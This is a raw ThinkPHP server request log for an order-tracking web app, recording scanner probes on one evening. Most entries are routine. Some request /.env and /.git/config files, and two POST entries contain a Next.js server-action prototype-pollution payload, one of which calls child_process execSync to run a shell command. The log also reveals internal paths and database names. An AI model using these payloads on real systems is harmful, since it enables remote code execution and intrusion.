INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001100s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.well-known', 1 => 'security.txt', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T19:50:57+08:00 ] 196.251.100.176 GET /plugins/content/apismtp/josmtpapi.php?test=hello [ info ] clcoa.com/plugins/content/apismtp/josmtpapi.php?test=hello [运行时间:0.020099s][吞吐率:49.75req/s] [内存消耗:2,226.84kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001196s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'plugins', 1 => 'content', 2 => 'apismtp', ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'user-agent' => 'ALittle Client', 'host' => 'clcoa.com', 'content-type' => 'application/json', 'content-length' => '0', 'connection' => 'Keep-Alive', ) [ info ] [ PARAM ] array ( 'test' => 'hello', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T19:53:05+08:00 ] 198.235.24.148 GET /.well-known/security.txt [ info ] 47.105.33.115:443/.well-known/security.txt [运行时间:0.018914s][吞吐率:52.87req/s] [内存消耗:2,227.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001148s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.well-known', 1 => 'security.txt', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T19:58:07+08:00 ] 95.215.0.144 GET /aaa9 [ info ] 47.105.33.115:8081/aaa9 [运行时间:0.020367s][吞吐率:49.10req/s] [内存消耗:2,225.92kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000059s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001254s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'aaa9', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T19:58:08+08:00 ] 95.215.0.144 GET /aab9 [ info ] 47.105.33.115:8081/aab9 [运行时间:0.022108s][吞吐率:45.23req/s] [内存消耗:2,225.92kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001155s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'aab9', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:00:02+08:00 ] 107.170.42.162 GET /.env [ info ] 47.105.33.115/.env [运行时间:0.019313s][吞吐率:51.78req/s] [内存消耗:2,228.14kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001132s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.env', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:00:04+08:00 ] 107.170.42.162 GET /.git/config [ info ] 47.105.33.115/.git/config [运行时间:0.019673s][吞吐率:50.83req/s] [内存消耗:2,228.16kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001125s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.git', 1 => 'config', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:00:28+08:00 ] 204.76.203.51 GET http://azenv.net/ [ info ] azenv.nethttp://azenv.net/ [运行时间:0.040389s][吞吐率:24.76req/s] [内存消耗:3,332.63kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001767s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'azenv.net', 'user-agent' => 'Go-http-client/1.1', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002676s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000148s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:01:01+08:00 ] 134.199.171.238 POST / [ info ] 47.105.33.115:443/ [运行时间:0.044408s][吞吐率:22.52req/s] [内存消耗:4,789.00kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001154s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0', 'content-length' => '358', 'content-type' => 'multipart/form-data; boundary=----B1765713660829099399', 'next-action' => 'x', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( 0 => '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B0\\"}","_response":{"_prefix":"test","_formData":{"get":"$1:constructor:constructor"}}}', 1 => '"$@0"', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001555s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ DB ] INIT mysql [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.016888s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000496s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000834s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '[\"{\\\"then\\\":\\\"$1:__proto__:then\\\",\\\"status\\\":\\\"resolved_model\\\",\\\"reason\\\":-1,\\\"value\\\":\\\"{\\\\\\\"then\\\\\\\":\\\\\\\"$B0\\\\\\\"}\\\",\\\"_response\\\":{\\\"_prefix\\\":\\\"test\\\",\\\"_formData\\\":{\\\"get\\\":\\\"$1:constructor:constructor\\\"}}}\",\"\\\"$@0\\\"\"]' , '/' , 0 , 'Unknown' , 'Mozilla/5.0' , '134.199.171.238' , 1765713661) [ RunTime:0.005128s ] --------------------------------------------------------------- [ 2025-12-14T20:01:06+08:00 ] 134.199.171.238 GET / [ info ] 47.105.33.115:443/ [运行时间:0.034351s][吞吐率:29.11req/s] [内存消耗:3,332.88kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001401s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001973s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000117s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:02:09+08:00 ] 34.38.83.65 GET / [ info ] 47.105.33.115/ [运行时间:0.030110s][吞吐率:33.21req/s] [内存消耗:3,333.12kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001294s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'python-requests/2.32.5', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001702s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000114s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:04:10+08:00 ] 80.94.92.10 GET / [ info ] www.clcoa.com/ [运行时间:0.037567s][吞吐率:26.62req/s] [内存消耗:3,333.15kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000059s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.002029s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'www.clcoa.com', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002143s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000165s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:04:11+08:00 ] 80.94.92.10 GET / [ info ] clcoa.com/ [运行时间:0.029648s][吞吐率:33.73req/s] [内存消耗:3,332.99kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001265s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001542s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000137s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:04:27+08:00 ] 80.94.92.10 GET / [ info ] 47.105.33.115/ [运行时间:0.026732s][吞吐率:37.41req/s] [内存消耗:3,333.09kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001107s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001505s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000118s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:04:45+08:00 ] 80.94.92.10 GET / [ info ] 47.105.33.115/ [运行时间:0.028573s][吞吐率:35.00req/s] [内存消耗:3,333.15kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001186s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001579s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000101s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:08:50+08:00 ] 49.248.192.204 POST / [ info ] clcoa.com/ [运行时间:0.044127s][吞吐率:22.66req/s] [内存消耗:4,789.71kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001107s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'connection' => 'close', 'content-length' => '723', 'content-type' => 'multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad', 'next-action' => 'x', 'x-nextjs-request-id' => 'b5dce965', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( 0 => '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'echo $((41*271))\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${encodeURIComponent(res)};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}', 1 => '"$@0"', 2 => '[]', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001496s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ DB ] INIT mysql [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.016635s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000442s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000953s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"1\":\"\\\"$@0\\\"\",\"2\":\"[]\"}' , '/' , 0 , 'Unknown' , 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' , '49.248.192.204' , 1765714130) [ RunTime:0.005149s ] --------------------------------------------------------------- [ 2025-12-14T20:19:05+08:00 ] 38.58.179.181 GET http://check.9tb.org/ [ info ] check.9tb.orghttp://check.9tb.org/ [运行时间:0.029574s][吞吐率:33.81req/s] [内存消耗:3,333.26kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001190s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'check.9tb.org', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001610s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000103s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T20:49:45+08:00 ] 206.168.34.39 GET /gendan/public/ [ info ] 47.105.33.115:8084/gendan/public/ [运行时间:0.028848s][吞吐率:34.66req/s] [内存消耗:3,333.02kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001211s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8084', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'referer' => 'http://47.105.33.115:8084/gendan/public', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001618s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000129s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:00:50+08:00 ] 159.223.235.224 GET / [ info ] 47.105.33.115/ [运行时间:0.025859s][吞吐率:38.67req/s] [内存消耗:3,286.59kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001129s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-language' => 'en-US,en;q=0.5', 'accept-encoding' => 'gzip, deflate', 'connection' => 'keep-alive', 'upgrade-insecure-requests' => '1', 'sec-fetch-dest' => 'document', 'sec-fetch-mode' => 'navigate', 'sec-fetch-site' => 'none', 'sec-fetch-user' => '?1', 'priority' => 'u=0, i', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001469s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000093s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:00:57+08:00 ] 38.58.179.181 GET http://check.9tb.org/ [ info ] check.9tb.orghttp://check.9tb.org/ [运行时间:0.026819s][吞吐率:37.29req/s] [内存消耗:3,333.26kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001093s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'check.9tb.org', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001457s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:04:56+08:00 ] 204.76.203.8 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.036878s][吞吐率:27.12req/s] [内存消耗:3,331.99kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001140s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 